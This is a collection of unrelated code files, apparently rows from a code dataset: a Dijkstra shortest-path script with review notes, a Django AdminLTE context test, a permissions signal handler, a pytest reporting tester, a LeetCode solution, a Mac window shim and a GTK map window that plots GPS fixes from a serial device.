    # in view — presumably set elsewhere (e.g. inside a caller); confirm.
    minDist = approxInf
    u = None
    for v in H:
        if v[1] <= minDist:
            minDist = v[1]
            u = v
    # NOTE(review): list.pop expects an integer index, but `u` is the
    # [vertex, distance] pair itself — this raises TypeError as written.
    # The index of the minimum should be tracked instead (see extract_min).
    return(H.pop(u))
def extract_minOld2(H):
    """
    Pop and return the [vertex, distance] pair from queue `H` with the
    minimal upper-bound estimate of distance to the source.

    For the chosen vertex v, the bound ds(v) equals the true distance d(s,v)
    (Dijkstra's extract-min lemma). The pair is removed from `H` in place.

    Fixes vs. original:
    - `i += i` never advanced the counter (i stayed 0), so the popped index
      was wrong whenever the minimum was not at position 0; uses enumerate.
    - Drops the dependency on the module-level `approxInf` sentinel, which
      is only assigned under the __main__ guard.
    """
    min_dist = float('inf')
    imin = None  # index of the current minimum pair
    for i, (v, d) in enumerate(H):
        if d <= min_dist:
            min_dist = d
            imin = i
    return H.pop(imin)  # the [vertex, distance] pair
def extract_min(H, ds):
    """
    Pop and return the vertex in queue `H` whose distance upper bound in
    `ds` is minimal (ties resolve to the last minimum seen).

    `ds` is the distance array, passed explicitly absent a real priority
    queue implementation. For the returned vertex v, ds[v] is the true
    distance d(s, v) by Dijkstra's extract-min lemma. The vertex (not a
    [vertex, distance] pair) is removed from `H` and returned.

    Fix vs. original: the infinity sentinel was the module-level `approxInf`,
    which is only assigned under the __main__ guard, so importing this module
    and calling extract_min raised NameError; uses float('inf') instead.
    """
    min_dist = float('inf')
    imin = None  # index in H of the current minimum vertex
    for i, v in enumerate(H):
        if ds[v] <= min_dist:
            min_dist = ds[v]
            imin = i
    return H.pop(imin)  # the vertex itself
# In Dijkstra: we generate an SPT (shortest path tree) for a given source `S` as root.
# The algorithm maintains two sets:
# The set H of "unknown" vertices includes vertices that have not been fully evaluated,
# and that are not yet included in the shortest-path tree.
# The other set/region, R = not(H), contains vertices whose distance to the root is correctly known,
# and which are included in the shortest-path tree.
def dijkstra(adj, cost, s, t):
    """
    dijkstra(adj, cost, s, t)
    From a weighted, directed graph G represented as adjacency lists `adj`,
    with (non-negative) edge weights organized in parallel lists `cost`,
    return the shortest-path distance from source `s` to terminus `t`.

    Returns float('inf') when `t` is unreachable (the original docstring
    claimed -1, but -1 is produced by the `distance` wrapper, not here).

    Fixes vs. original:
    - The infinity sentinel was the module-level `approxInf`, assigned only
      under the __main__ guard; float('inf') (== math.inf) is used instead,
      so the function works when imported.
    - The trivial make_queue/extract_min helpers are inlined, making the
      function self-contained; ties in the linear min-scan may be broken
      differently, which cannot change the resulting distances.
    - Stops early once `t` is extracted (its distance is then final) or
      once only unreachable vertices remain.
    Note: assumes vertices are numbered sequentially 0..n-1 (as produced by
    the parser); this is not fully general.
    """
    inf = float('inf')
    n = len(adj)
    # dist[v] is an upper bound on the true distance from s to v.
    dist = [inf] * n
    prev = [None] * n  # predecessor on the shortest path (kept for clarity)
    dist[s] = 0  # zero distance to the start node
    H = list(range(n))  # the set of "unknown" (not fully evaluated) vertices
    while H:
        # Linear scan stand-in for ExtractMin on a priority queue.
        imin = 0
        for i in range(1, len(H)):
            if dist[H[i]] < dist[H[imin]]:
                imin = i
        u = H.pop(imin)
        # Lemma: when u is extracted, dist[u] is the true distance d(s, u).
        if dist[u] == inf:
            break  # everything left is unreachable from s
        if u == t:
            break  # dist[t] is final; no need to process the rest
        # Relax all outgoing edges (u, v).
        for i, v in enumerate(adj[u]):
            alt = dist[u] + cost[u][i]
            if alt < dist[v]:
                dist[v] = alt
                prev[v] = u
    return dist[t]
def distance(adj, cost, s, t):
    """
    Return the weight of a shortest path from `s` to `t` in the graph given
    by adjacency lists `adj` and parallel cost lists `cost`, or -1 if `t`
    is unreachable.

    Fix vs. original: compared against the module-level `approxInf`, which
    is only assigned under the __main__ guard (NameError on import); uses
    float('inf') (== math.inf), which is what dijkstra returns for an
    unreachable terminus.
    """
    dist_to_t = dijkstra(adj, cost, s, t)
    if dist_to_t < float('inf'):
        return dist_to_t
    return -1
# Task. Given an directed graph with positive edge weights and
# with `n` vertices and 𝑚 edges as well as two vertices `u` and `v`,
# compute the weight of a shortest path between `u` and `v`
# (that is, the minimum total weight of a path from `u` to `v`).
# Input Format. A graph is given in the standard format.
# The next (final) line contains two vertices `u` and `v`.
# Output Format.
# Output the minimum weight of a path from `u` to `v`, or −1 if there is no path.
if __name__ == '__main__':
    # Script entry point: read a weighted digraph plus an (s, t) pair and
    # print the shortest-path distance, or -1 if t is unreachable.
    debug = False
    readFromStandardInput = True
    if readFromStandardInput:
        # NOTE(review): requires `import sys` earlier in the file -- not
        # visible in this chunk; confirm.
        (adj, cost, s, t) = parse_weighted_digraph_input_to_G_s_and_t(sys.stdin.read())
    else: # expect a named data structure (list) to read from
        # NOTE(review): `sample_wdigraph1` must be defined earlier in the
        # file -- not visible here; confirm before using this branch.
        (adj, cost, s, t) = parse_weighted_digraph_input_to_G_s_and_t(sample_wdigraph1)
    # Module-level sentinel used by dijkstra/distance/extract_min as an
    # impossibly large distance (upper bound). Must be assigned before
    # distance() is called; requires `import math` earlier in the file.
    approxInf = math.inf # establish an impossibly far distance, signal upper bound
    print(distance(adj, cost, s, t))
|
from django.test import Client
from django.test import SimpleTestCase
from adminlte2_templates.core import reverse
class ContextTestCase(SimpleTestCase):
    """Verify that the AdminLTE context processor exposes the expected
    template-context variables under the relevant settings combinations.
    """

    def setUp(self):
        self.client = Client()

    def context_exists(self, context):
        """Return True when `context` is present (and not None) in the
        response context of the 'layouts:default_boxed' view.
        """
        # Get view from 'layouts' unit test
        response = self.client.get(reverse('layouts:default_boxed'))
        try:
            return response.context[context] is not None
        except KeyError:
            return False

    def _assert_present(self, *keys):
        """Assert that every key appears in the template context."""
        for key in keys:
            self.assertTrue(self.context_exists(key))

    def _assert_absent(self, *keys):
        """Assert that no key appears in the template context."""
        for key in keys:
            self.assertFalse(self.context_exists(key))

    # The six CDN core asset keys toggled together by ADMINLTE_USE_CDN.
    _CDN_CORE_KEYS = (
        'ADMINLTE_CDN_ADMINLTE_CSS_CORE',
        'ADMINLTE_CDN_ADMINLTE_CSS_SKIN',
        'ADMINLTE_CDN_ADMINLTE_JS_CORE',
        'ADMINLTE_CDN_BOOTSTRAP_CSS_CORE',
        'ADMINLTE_CDN_BOOTSTRAP_JS_CORE',
        'ADMINLTE_CDN_JQUERY_JS_CORE',
    )

    def test_debug_context(self):
        self._assert_present('DEBUG')

    def test_html_lang_context(self):
        self._assert_present('ADMINLTE_HTML_LANG')

    def test_html_lang_bidi_context(self):
        self._assert_present('ADMINLTE_HTML_LANG_BIDI')

    def test_skin_style_context(self):
        self._assert_present('ADMINLTE_SKIN_STYLE')

    def test_control_style_context(self):
        self._assert_present('ADMINLTE_CONTROL_STYLE')

    def test_footer_version_context(self):
        self._assert_present('ADMINLTE_FOOTER_VERSION')

    def test_use_shim_context(self):
        self._assert_present('ADMINLTE_USE_SHIM')

    def test_use_cdn_context(self):
        self._assert_present('ADMINLTE_USE_CDN')

    def test_use_cdn_context_true(self):
        with self.settings(ADMINLTE_USE_CDN=True):
            self._assert_present(*self._CDN_CORE_KEYS)

    def test_use_cdn_context_false(self):
        with self.settings(ADMINLTE_USE_CDN=False):
            self._assert_absent(*self._CDN_CORE_KEYS)

    # Shims
    def test_use_cdn_and_use_shim_context_true(self):
        with self.settings(ADMINLTE_USE_CDN=True, ADMINLTE_USE_SHIM=True):
            self._assert_present('ADMINLTE_CDN_HTML5SHIV_JS_CORE',
                                 'ADMINLTE_CDN_RESPOND_JS_CORE')

    def test_use_cdn_and_use_shim_context_false(self):
        with self.settings(ADMINLTE_USE_CDN=True, ADMINLTE_USE_SHIM=False):
            self._assert_absent('ADMINLTE_CDN_HTML5SHIV_JS_CORE',
                                'ADMINLTE_CDN_RESPOND_JS_CORE')

    # DataTables
    def test_use_cdn_and_enable_datatables_context_true(self):
        with self.settings(ADMINLTE_USE_CDN=True, ADMINLTE_STATIC_ENABLE_DATATABLES=True):
            self._assert_present('ADMINLTE_CDN_DATATABLES_CSS_CORE',
                                 'ADMINLTE_CDN_DATATABLES_JS_CORE')

    def test_use_cdn_and_enable_datatables_context_false(self):
        with self.settings(ADMINLTE_USE_CDN=True, ADMINLTE_STATIC_ENABLE_DATATABLES=False):
            self._assert_absent('ADMINLTE_CDN_DATATABLES_CSS_CORE',
                                'ADMINLTE_CDN_DATATABLES_JS_CORE')

    # Font Awesome
    def test_use_cdn_and_enable_fontawesome_context_true(self):
        with self.settings(ADMINLTE_USE_CDN=True, ADMINLTE_STATIC_ENABLE_FONTAWESOME=True):
            self._assert_present('ADMINLTE_CDN_FONTAWESOME_CSS_CORE')

    def test_use_cdn_and_enable_fontawesome_context_false(self):
        with self.settings(ADMINLTE_USE_CDN=True, ADMINLTE_STATIC_ENABLE_FONTAWESOME=False):
            self._assert_absent('ADMINLTE_CDN_FONTAWESOME_CSS_CORE')

    # Select2
    def test_use_cdn_and_enable_select2_context_true(self):
        with self.settings(ADMINLTE_USE_CDN=True, ADMINLTE_STATIC_ENABLE_SELECT2=True):
            self._assert_present('ADMINLTE_CDN_SELECT2_CSS_CORE')

    def test_use_cdn_and_enable_select2_context_false(self):
        with self.settings(ADMINLTE_USE_CDN=True, ADMINLTE_STATIC_ENABLE_SELECT2=False):
            self._assert_absent('ADMINLTE_CDN_SELECT2_CSS_CORE')
|
from django.db.models.signals import post_save
from django.dispatch import receiver
from onadata.apps.logger.models import MergedXForm
from onadata.libs.permissions import OwnerRole
from onadata.libs.utils.project_utils import set_project_perms_to_xform
@receiver(
    post_save,
    sender=MergedXForm,
    dispatch_uid='set_project_perms_to_merged_xform')
def set_object_permissions(sender, instance=None, created=False, **kwargs):
    """Grant owner roles and project permissions on a newly created
    MergedXForm and its underlying XForm.

    Runs on post_save; does nothing for updates (created=False).
    """
    if not created:
        return

    targets = (instance, instance.xform_ptr)
    for obj in targets:
        OwnerRole.add(instance.user, obj)
    # Also grant ownership to the creator when different from the owner.
    if instance.created_by and instance.user != instance.created_by:
        for obj in targets:
            OwnerRole.add(instance.created_by, obj)
    for obj in targets:
        set_project_perms_to_xform(obj, instance.project)
|
"""parallelizer tester
Useful to make sure tests are being parallelized properly, and then reported correctly.
This file is named specially to prevent being picked up by py.test's default collector, and should
not be run during a normal test run.
"""
import random
from time import sleep
import pytest
# Apply the 'param' and 'wait' fixtures to every test in this module.
pytestmark = pytest.mark.usefixtures('param', 'wait')
def pytest_generate_tests(metafunc):
# Starts at 10 for vane reason: Artifactor report does a naive sort, so 10 comes before 1
ids = [i + 10 for i in xrange(20)]
random.shuffle(ids)
argvalues = [[v] for v in ids]
metafunc.parametrize(['param'], argvalues, ids=ids, scope='module')
@pytest.fixture
def wait():
    """Sleep a random interval (0-5 s) before each test."""
    # Add some randomness to make sure reports are getting mixed up like they would in a "real" run
    sleep(random.random() * 5)
@pytest.fixture
def setup_fail():
    """Fixture that always errors during setup."""
    raise Exception('I failed to setup!')
# NOTE(review): pytest.yield_fixture is deprecated in modern pytest; plain
# pytest.fixture supports yield -- confirm the targeted pytest version.
@pytest.yield_fixture
def teardown_fail():
    """Fixture that always errors during teardown (after the test ran)."""
    yield
    raise Exception('I failed to teardown!')
def test_passes():
    """Intentionally passes."""
    pass
def test_fails():
    """Intentionally fails."""
    raise Exception('I failed!')
@pytest.mark.xfail
def test_xfails():
    """Expected failure: marked xfail and raises."""
    raise Exception('I failed!')
@pytest.mark.xfail
def test_xpasses():
    """Unexpected pass: marked xfail but succeeds."""
    pass
def test_fails_setup(setup_fail):
    """Errors in fixture setup, not in the test body."""
    pass
def test_fails_teardown(teardown_fail):
    """Errors in fixture teardown, not in the test body."""
    pass
@pytest.mark.skipif('True')
def test_skipped():
    """Always skipped (condition string evaluates to True)."""
    pass
|
class Solution:
    def minimumHammingDistance(self, source: List[int], target: List[int], allowedSwaps: List[List[int]]) -> int:
        """Iterative DFS over swap-connected components.

        Positions linked by allowedSwaps form components whose elements can
        be permuted freely; within each component, the unavoidable mismatch
        count is the surplus of source values over target values.
        """
        adjacency = defaultdict(set)
        for u, v in allowedSwaps:
            adjacency[u].add(v)
            adjacency[v].add(u)

        seen = set()
        mismatches = 0
        for start in range(len(source)):
            if start in seen:
                continue
            seen.add(start)
            # Value multisets of source/target within this component.
            src_counts = defaultdict(int)
            tgt_counts = defaultdict(int)
            stack = [start]
            while stack:
                node = stack.pop()
                src_counts[source[node]] += 1
                tgt_counts[target[node]] += 1
                for neighbor in adjacency[node]:
                    if neighbor not in seen:
                        seen.add(neighbor)
                        stack.append(neighbor)
            for value, count in src_counts.items():
                mismatches += max(0, count - tgt_counts[value])
        return mismatches
|
# VCS revision keyword; expanded by RCS/CVS on checkout.
__version__ = "$Id$"
import mac_windowbase
# Instantiate the single toplevel object and publish it back into the
# mac_windowbase module so that module's own globals can reach it.
_Toplevel = mac_windowbase._Toplevel
toplevel = _Toplevel()
mac_windowbase.toplevel = toplevel
# Re-export mac_windowbase's public names at this module's top level.
# NOTE(review): the star-import intentionally happens AFTER the toplevel
# singleton is installed above -- do not reorder.
from mac_windowbase import *
# Expose the singleton's bound methods as plain module-level functions,
# so callers use e.g. `mainloop()` instead of `toplevel.mainloop()`.
addclosecallback = toplevel.addclosecallback
canceltimer = toplevel.canceltimer
close = toplevel.close
mainloop = toplevel.mainloop
newcmwindow = toplevel.newcmwindow
newwindow = toplevel.newwindow
select_setcallback = toplevel.select_setcallback
setcursor = toplevel.setcursor
settimer = toplevel.settimer
setidleproc = toplevel.setidleproc
cancelidleproc = toplevel.cancelidleproc
lopristarting = toplevel.lopristarting
getscreensize = toplevel.getscreensize
getscreendepth = toplevel.getscreendepth
# remove superfluous names (the bound methods above keep the instance alive)
del mac_windowbase
del toplevel
|
import serial
import serial.tools.list_ports_linux as ports
import gi.repository.GLib as gobject
import gi
gi.require_version("Gtk", "3.0")
from gi.repository import Gtk as gtk
import pytopo.MapWindow as MapWindow
import pytopo.MapViewer as MapViewer
import gc
import re
class MyMapWindow(MapWindow):
    """pytopo MapWindow subclass that adds a serial-device panel (combo box,
    zoom spinner, connect/disconnect buttons) for tracking a GPS device and
    drawing its reported position on the map.
    """
    #override init
    def __init__(self, _controller):
        MapWindow.__init__(self, _controller)
        # Zoom-level spinner: starts at 15, clamped to the range 2-19.
        ad = gtk.Adjustment(value=15,lower=2,upper=19,step_increment=1,page_increment=0,page_size=0)
        self.spin = gtk.SpinButton(adjustment=ad, climb_rate=1, digits=0)
        self.connected_dev = None;
        self.connected = False;
        # Model columns: (device path, manufacturer).
        self.devices = gtk.ListStore(str, str)
        self.renderer = gtk.CellRendererText()
        self.grid = gtk.Grid()
        self.devices_combo = gtk.ComboBox.new_with_model_and_entry(self.devices)
        self.connect_button = gtk.Button.new_with_label("Connect")
        self.disconnect_button = gtk.Button.new_with_label("Disconnect")
    #override show window
    def show_window(self, init_width, init_height):
        """Create the initial window."""
        win = gtk.Window()
        win.set_name("Ground Station")
        win.connect("destroy", self.graceful_exit)
        win.set_border_width(5)
        win.add(self.grid)
        # Populate the device combo before wiring up its signals.
        self.load_devices()
        self.devices_combo.pack_start(self.renderer, True)
        self.devices_combo.add_attribute(self.renderer, 'text', 0)
        self.devices_combo.set_entry_text_column(1)
        self.devices_combo.connect("changed",self.on_chose_from_combo)
        self.connect_button.connect("clicked", self.click_connect)
        self.disconnect_button.connect("clicked", self.click_disconnect)
        # Disconnect only makes sense once connected.
        self.disconnect_button.set_sensitive(False)
        self.drawing_area = gtk.DrawingArea()
        # Map fills a 50x50 cell region; controls sit in a column to its right.
        self.grid.attach(self.drawing_area,0,0,50,50)
        self.grid.attach(self.devices_combo,50,0,10,1)
        self.grid.attach(self.spin,50,1,10,1)
        self.grid.attach(self.connect_button,50,2,10,1)
        self.grid.attach(self.disconnect_button,50,3,10,1)
        #make widget fill window
        self.drawing_area.set_vexpand(True)
        self.drawing_area.set_hexpand(True)
        self.devices_combo.set_vexpand(False)
        self.devices_combo.set_hexpand(False)
        # NOTE(review): gtk.gdk.* is GTK2-style naming; under the GI/GTK3
        # imports at the top of this file the Gdk constants live in
        # gi.repository.Gdk -- confirm this call works on the target setup.
        self.drawing_area.set_events(gtk.gdk.EXPOSURE_MASK |
                                     gtk.gdk.SCROLL_MASK |
                                     gtk.gdk.POINTER_MOTION_MASK |
                                     gtk.gdk.POINTER_MOTION_HINT_MASK |
                                     gtk.gdk.BUTTON_PRESS_MASK |
                                     gtk.gdk.BUTTON_RELEASE_MASK)
        try:
            # GTK2:
            self.drawing_area.connect("expose-event", self.expose_event)
        except TypeError:
            # Python3/GI GTK3:
            self.drawing_area.connect('size-allocate', self.on_size_allocate)
            self.width = self.height = 0
            self.drawing_area.connect('draw', self.expose3)
        self.drawing_area.connect("button-press-event", self.mousepress)
        self.drawing_area.connect("button-release-event", self.mouserelease)
        self.drawing_area.connect("scroll-event", self.scroll_event)
        self.drawing_area.connect("motion_notify_event", self.drag_event)
        self.drawing_area.connect("focus-in-event", self.nop)
        self.drawing_area.connect("focus-out-event", self.nop)
        # Handle key presses on the drawing area.
        self.drawing_area.set_property('can-focus', True)
        self.drawing_area.connect("key-press-event", self.key_press_event)
        # Resize the window now to the desired initial size:
        win.resize(init_width, init_height)
        win.show_all()
        if self.gps_poller:
            gobject.threads_init()
        gtk.main()
    def selection_window(self):
        """Skip the interactive site chooser and use a hard-coded start site."""
        #manual beginning site
        site = ['Home', 31.121302, 30.018407, 'Wikimedia', 15]#wikimedia
        self.controller.use_site(site, self)
        return;
    #this function is called when GO button is clicked
    def go_to_location(self):
        """Drain pending serial lines; on a GPS line, move the map pin to the
        reported coordinates and redraw.

        Runs from a gobject timeout; returning self.connected keeps the
        timer alive only while a device is connected.
        """
        while self.connected_dev.in_waiting:
            line =self.connected_dev.readline().decode("utf-8")
            # Expected telemetry line: GPS,<f1>,<lat>,<f3>,<lon>,<f5>,<f6>,<f7>,
            matchObj = re.match( r'GPS,(.*),(.*),(.*),(.*),(.*),(.*),(.*),', line)
            if matchObj:
                print(float(matchObj.group(1)), float(matchObj.group(2)), str(matchObj.group(3)), float(matchObj.group(4)), str(matchObj.group(5)))
                # NOTE(review): zoom_to is passed the spinner value and
                # self.center_lat -- verify this matches the pytopo
                # MapCollection.zoom_to signature.
                self.collection.zoom_to(self.spin.get_value_as_int() ,self.center_lat)
                # NOTE(review): group(2)/group(4) are assumed to be
                # latitude/longitude respectively -- confirm against the
                # transmitter's line format.
                self.pin_lon = float(matchObj.group(4))
                self.pin_lat = float(matchObj.group(2))
                self.draw_map()
            else:
                print(line)
        return self.connected
    def on_chose_from_combo(self, combo):
        """Combo 'changed' handler: the sentinel 'Search' row rescans ports."""
        itr = combo.get_active_iter()
        model = combo.get_model()
        if model[itr][0] == "Search":
            self.load_devices()
    def load_devices(self):
        """Rebuild the device list from the currently attached serial ports,
        plus a trailing 'Search' row that triggers a rescan when selected.
        """
        self.devices = gtk.ListStore(str, str)
        lis = ports.comports()
        for port in lis:
            self.devices.append([port.device, port.manufacturer])
        self.devices.append(["Search","None"])
        self.devices_combo.set_model(self.devices)
        self.connected_dev = None
    def click_connect(self, widget):
        """Open the selected serial port and start polling it every 50 ms."""
        itr = self.devices_combo.get_active_iter()
        model = self.devices_combo.get_model()
        if itr == None:
            print(f'Select Valid device')
            return
        selected = model[itr][0]
        for port in ports.comports():
            if(port.device == selected):
                self.connected_dev = serial.Serial(selected)
                self.connected = True;
                self.connect_button.set_sensitive(False)
                self.disconnect_button.set_sensitive(True)
                self.devices_combo.set_sensitive(False)
                # Poll the serial device every 50 ms; the timer stops once
                # go_to_location returns False (after disconnect).
                gobject.timeout_add(50, self.go_to_location)
                return
        print(f'{selected} is not connected device')
    def click_disconnect(self, widget):
        """Stop polling (via the connected flag) and re-enable the UI.

        NOTE(review): the serial port object is not closed here -- confirm
        whether connected_dev.close() should be called.
        """
        self.connected = False
        self.connect_button.set_sensitive(True)
        self.disconnect_button.set_sensitive(False)
        self.devices_combo.set_sensitive(True)
class MyMapViewer(MapViewer):
    """MapViewer subclass that launches the customized MyMapWindow instead of
    pytopo's stock window.
    """
    def main(self):
        """main execution routine for pytopo."""
        # Load user configuration first; later steps depend on it.
        self.exec_config_file()
        # Remember how many known sites we got from the config file;
        # the rest are read in from saved sites and may need to be re-saved.
        self.first_saved_site = len(self.KnownSites)
        # Now it's safe to read the saved sites.
        self.read_saved_sites()
        self.read_tracks()
        gc.enable()
        mapwin = MyMapWindow(self)
        # Choose the hard-coded start site before opening the window.
        mapwin.selection_window()
        # Blocks inside gtk.main() until the window is destroyed.
        mapwin.show_window(self.init_width, self.init_height)
# Module entry: build the viewer and run it (blocks in the GTK main loop).
viewer = MyMapViewer()
viewer.main()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.